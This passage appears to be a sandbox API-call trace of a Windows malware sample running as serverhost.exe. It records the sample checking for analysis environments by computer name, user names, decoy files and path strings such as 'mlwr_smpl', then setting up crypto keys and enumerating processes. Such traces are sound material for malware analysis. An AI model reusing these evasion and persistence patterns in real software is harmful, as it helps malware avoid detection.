Ordinal=0x0, ProcedureAddress=0x2cf41c | out: ProcedureAddress=0x2cf41c*=0x772af774) returned 0x0 [0076.225] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x2cf41c | out: ProcedureAddress=0x2cf41c*=0x7731ad2e) returned 0x0 [0076.225] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0076.225] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleFileNameA") returned 0x765e33f6 [0076.225] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameA") returned 0x765c6ba9 [0076.225] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0076.225] GetProcAddress (hModule=0x76590000, lpProcName="lstrcmpA") returned 0x765c8c59 [0076.225] GetProcAddress (hModule=0x76590000, lpProcName="FreeConsole") returned 0x7663bfde [0076.225] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameExA") returned 0x7661f41f [0076.225] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0076.225] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0076.225] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764f0000 [0076.225] GetProcAddress (hModule=0x764f0000, lpProcName="GetUserNameA") returned 0x7651a4b4 [0076.225] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76b40000 [0076.226] GetProcAddress (hModule=0x76b40000, lpProcName="StrStrIA") returned 0x76b4d250 [0076.226] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x772a0000 [0076.226] GetProcAddress (hModule=0x772a0000, lpProcName="strchr") returned 0x772e7690 [0076.226] GetUserNameA (in: lpBuffer=0x2cf34c, pcbBuffer=0x2cf148 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x2cf148) returned 1 [0076.228] GetComputerNameA (in: lpBuffer=0x2cf24c, nSize=0x2cf148 | out: lpBuffer="F71GWAT", nSize=0x2cf148) returned 1 [0076.229] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x2cf14c, nSize=0x2cf148 | out: lpBuffer="F71gwat", nSize=0x2cf148) returned 1 [0076.229] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0076.229] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0076.229] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0076.229] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0076.229] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0076.229] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0076.229] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.229] CloseHandle (hObject=0xffffffff) returned 0 [0076.229] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.229] CloseHandle (hObject=0xffffffff) returned 0 [0076.229] GetModuleHandleA (lpModuleName=0x0) returned 0xc40000 [0076.229] GetModuleFileNameA (in: hModule=0xc40000, lpFilename=0x2cf35c, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0076.229] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="sample") returned 0x0 [0076.229] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="mlwr_smpl") returned 0x0 [0076.229] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="artifact.exe") returned 0x0 [0076.230] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0076.231] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0076.231] GetProcAddress (hModule=0x76590000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x765c480b [0076.231] FreeConsole () returned 0 [0076.231] VirtualProtect (in: lpAddress=0x451000, dwSize=0x88aa, flNewProtect=0x20, lpflOldProtect=0x2cf444 | out: lpflOldProtect=0x2cf444*=0x4) returned 1 [0076.231] VirtualProtect (in: lpAddress=0x45a000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x2cf444 | out: lpflOldProtect=0x2cf444*=0x4) returned 1 [0076.231] VirtualProtect (in: lpAddress=0x45b000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x2cf444 | out: lpflOldProtect=0x2cf444*=0x4) returned 1 [0076.231] VirtualProtect (in: lpAddress=0x45c000, dwSize=0x4dc, flNewProtect=0x2, lpflOldProtect=0x2cf444 | out: lpflOldProtect=0x2cf444*=0x4) returned 1 [0076.231] VirtualProtect (in: lpAddress=0x450000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x2cf444 | out: lpflOldProtect=0x2cf444*=0x4) returned 1 [0077.553] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cf560, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0077.553] _snwprintf (in: _Dest=0x2cf768, _Count=0x40, _Format="E%X" | out: _Dest="EA991ED3B") returned 9 [0077.553] _snwprintf (in: _Dest=0x2cf7e8, _Count=0x40, _Format="M%X" | out: _Dest="MA991ED3B") returned 9 [0077.553] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EA991ED3B") returned 0x118 [0077.553] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MA991ED3B") returned 0x114 [0077.553] GetLastError () returned 0xb7 [0077.553] SetEvent (hEvent=0x118) returned 1 [0077.556] CloseHandle (hObject=0x118) returned 1 [0077.556] CloseHandle (hObject=0x114) returned 1 [0077.556] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0077.557] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x77140000 [0077.557] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0077.557] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x755b0000 [0077.561] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x76f00000 [0077.565] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74af0000 [0077.570] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x77040000 [0077.571] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x74180000 [0077.578] GetWindowsDirectoryW (in: lpBuffer=0x2cf340, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0077.578] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x45b27c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x45b27c*=0x78b95e2e, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0077.578] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x45b9c8, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0077.578] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x6) returned 0x0 [0077.579] lstrlenA (lpString="agent,app,audio,bio,bits,cache,card,cart,cert,com,crypt,dcom,defrag,device,dhcp,dns,event,evt,flt,gdi,group,help,home,host,info,iso,launch,log,logon,lookup,man,math,mgmt,msi,ncb,net,nv,nvidia,proc,prop,prov,provider,reg,rpc,screen,search,sec,server,service,shed,shedule,spec,srv,storage,svc,sys,system,task,time,video,view,win,window,wlan,wmi") returned 342 [0077.579] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x45b5b8 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x0 [0077.583] _snwprintf (in: _Dest=0x45b5b8, _Count=0x104, _Format="%s\\Microsoft\\Windows" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows") returned 56 [0077.583] _snwprintf (in: _Dest=0x45b7c0, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 71 [0077.583] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0077.583] CreateFileMappingW (hFile=0x140, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x144 [0077.583] MapViewOfFile (hFileMappingObject=0x144, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1980000 [0077.583] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17000 [0077.583] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x1980000, Length=0x17000) returned 0x5a5d3f39 [0077.584] UnmapViewOfFile (lpBaseAddress=0x1980000) returned 1 [0077.585] CloseHandle (hObject=0x144) returned 1 [0077.585] CloseHandle (hObject=0x140) returned 1 [0077.585] GetComputerNameW (in: lpBuffer=0x2cf310, nSize=0x2cf334 | out: lpBuffer="F71GWAT", nSize=0x2cf334) returned 1 [0077.585] _snprintf (in: _Dest=0x45b2a8, _Count=0x104, _Format="%S_%08X" | out: _Dest="F71GWAT_78B95E2E") returned 16 [0077.585] _snwprintf (in: _Dest=0x2cf2b0, _Count=0x40, _Format="Global\\I%X" | out: _Dest="Global\\I78B95E2E") returned 16 [0077.585] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\I78B95E2E") returned 0x140 [0077.585] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x0) returned 0x0 [0077.585] _snwprintf (in: _Dest=0x2cf1b0, _Count=0x40, _Format="Global\\E%X" | out: _Dest="Global\\E78B95E2E") returned 16 [0077.585] _snwprintf (in: _Dest=0x2cf230, _Count=0x40, _Format="Global\\M%X" | out: _Dest="Global\\M78B95E2E") returned 16 [0077.585] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\M78B95E2E") returned 0x144 [0077.585] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="Global\\E78B95E2E") returned 0x148 [0077.585] SignalObjectAndWait (hObjectToSignal=0x148, hObjectToWaitOn=0x144, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0077.585] ResetEvent (hEvent=0x148) returned 1 [0077.585] ReleaseMutex (hMutex=0x140) returned 1 [0077.585] CloseHandle (hObject=0x140) returned 1 [0077.585] GetTickCount () returned 0x1aed4 [0077.585] CreateTimerQueueTimer (in: phNewTimer=0x2cf330, TimerQueue=0x0, Callback=0x45835b, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x2cf330*=0x49eae8) returned 1 [0077.586] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) Thread: id = 75 os_tid = 0xc20 [0078.585] GetTickCount () returned 0x1b2ca [0079.583] GetTickCount () returned 0x1b6b1 [0079.583] lstrcmpiW (lpString1="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpString2="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 0 [0080.582] GetTickCount () returned 0x1ba97 [0080.582] CryptAcquireContextW (in: phProv=0x45b284, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x45b284*=0x4a0010) returned 1 [0080.598] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x4512f8, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x1a9fa98, pcbStructInfo=0x1a9fa9c | out: pvStructInfo=0x1a9fa98, pcbStructInfo=0x1a9fa9c) returned 1 [0080.599] CryptImportKey (in: hProv=0x4a0010, pbData=0x47f560, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x45b288 | out: phKey=0x45b288*=0x4a12b0) returned 1 [0080.599] LocalFree (hMem=0x47f560) returned 0x0 [0080.599] CryptGenKey (in: hProv=0x4a0010, Algid=0x660e, dwFlags=0x1, phKey=0x45b28c | out: phKey=0x45b28c*=0x4a1408) returned 1 [0080.599] CryptCreateHash (in: hProv=0x4a0010, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x45b290 | out: phHash=0x45b290) returned 1 [0081.580] GetTickCount () returned 0x1be7d [0081.580] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a9f654, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0081.580] lstrlenW (lpString="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 71 [0081.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14c [0081.583] Process32FirstW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.584] GetCurrentProcessId () returned 0xc18 [0081.584] lstrcpyW (in: lpString1=0x4a17dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0081.584] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0081.585] GetCurrentProcessId () returned 0xc18 [0081.585] lstrcpyW (in: lpString1=0x4a19f4, lpString2="System" | out: lpString1="System") returned="System" [0081.585] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0081.585] GetCurrentProcessId () returned 0xc18 [0081.585] lstrcpyW (in: lpString1=0x4a1c0c, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0081.585] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0081.586] GetCurrentProcessId () returned 0xc18 [0081.586] lstrcpyW (in: lpString1=0x4a1e24, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0081.586] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0081.587] GetCurrentProcessId () returned 0xc18 [0081.587] lstrcpyW (in: lpString1=0x4a203c, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0081.587] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0081.588] GetCurrentProcessId () returned 0xc18 [0081.588] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0081.589] GetCurrentProcessId () returned 0xc18 [0081.589] lstrcpyW (in: lpString1=0x4a2254, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0081.589] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0081.589] GetCurrentProcessId () returned 0xc18 [0081.589] lstrcpyW (in: lpString1=0x4a246c, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0081.589] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0081.590] GetCurrentProcessId () returned 0xc18 [0081.590] lstrcpyW (in: lpString1=0x4a2684, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0081.590] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0081.591] GetCurrentProcessId () returned 0xc18 [0081.591] lstrcpyW (in: lpString1=0x4a289c, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0081.591] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.591] GetCurrentProcessId () returned 0xc18 [0081.592] lstrcpyW (in: lpString1=0x4a2ab4, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0081.592] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.592] GetCurrentProcessId () returned 0xc18 [0081.592] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.593] GetCurrentProcessId () returned 0xc18 [0081.593] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.593] GetCurrentProcessId () returned 0xc18 [0081.593] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.594] GetCurrentProcessId () returned 0xc18 [0081.594] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0081.595] GetCurrentProcessId () returned 0xc18 [0081.595] lstrcpyW (in: lpString1=0x4a2ccc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0081.595] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.595] GetCurrentProcessId () returned 0xc18 [0081.595] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.596] GetCurrentProcessId () returned 0xc18 [0081.596] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0081.597] GetCurrentProcessId () returned 0xc18 [0081.597] lstrcpyW (in: lpString1=0x4a2ee4, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0081.597] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.598] GetCurrentProcessId () returned 0xc18 [0081.598] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0081.598] GetCurrentProcessId () returned 0xc18 [0081.598] lstrcpyW (in: lpString1=0x4a30fc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0081.598] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0081.599] GetCurrentProcessId () returned 0xc18 [0081.599] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x328, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0081.600] GetCurrentProcessId () returned 0xc18 [0081.600] lstrcpyW (in: lpString1=0x4a3314, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0081.600] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x5f4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0081.600] GetCurrentProcessId () returned 0xc18 [0081.600] lstrcpyW (in: lpString1=0x4a352c, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0081.600] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x66c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0081.601] GetCurrentProcessId () returned 0xc18 [0081.601] lstrcpyW (in: lpString1=0x4a3744, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0081.601] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0081.602] GetCurrentProcessId () returned 0xc18 [0081.602] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0081.602] GetCurrentProcessId () returned 0xc18 [0081.602] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0081.603] GetCurrentProcessId () returned 0xc18 [0081.603] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="blowiranlaboratorydisaster.exe")) returned 1 [0081.604] GetCurrentProcessId () returned 0xc18 [0081.604] lstrcpyW (in: lpString1=0x4a3974, lpString2="blowiranlaboratorydisaster.exe" | out: lpString1="blowiranlaboratorydisaster.exe") returned="blowiranlaboratorydisaster.exe" [0081.604] Process32NextW (in: hSnapshot=0x14c, lppe=0x1a9f85c | out: lppe=0x1a9f85c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="argentina conducting merchandise.exe")) returned 1 [0081.604] GetCurrentProcessId () returned 0xc18 [0081.604] lstrcpyW (in: lpString1=0x4a3b9c, lpString2="argentina conducting merchandise.exe" | out: lpString1="argentina conducting merchandise.exe") returned="argentina conducting merchandise.exe" [0081.604] Process32NextW (in: 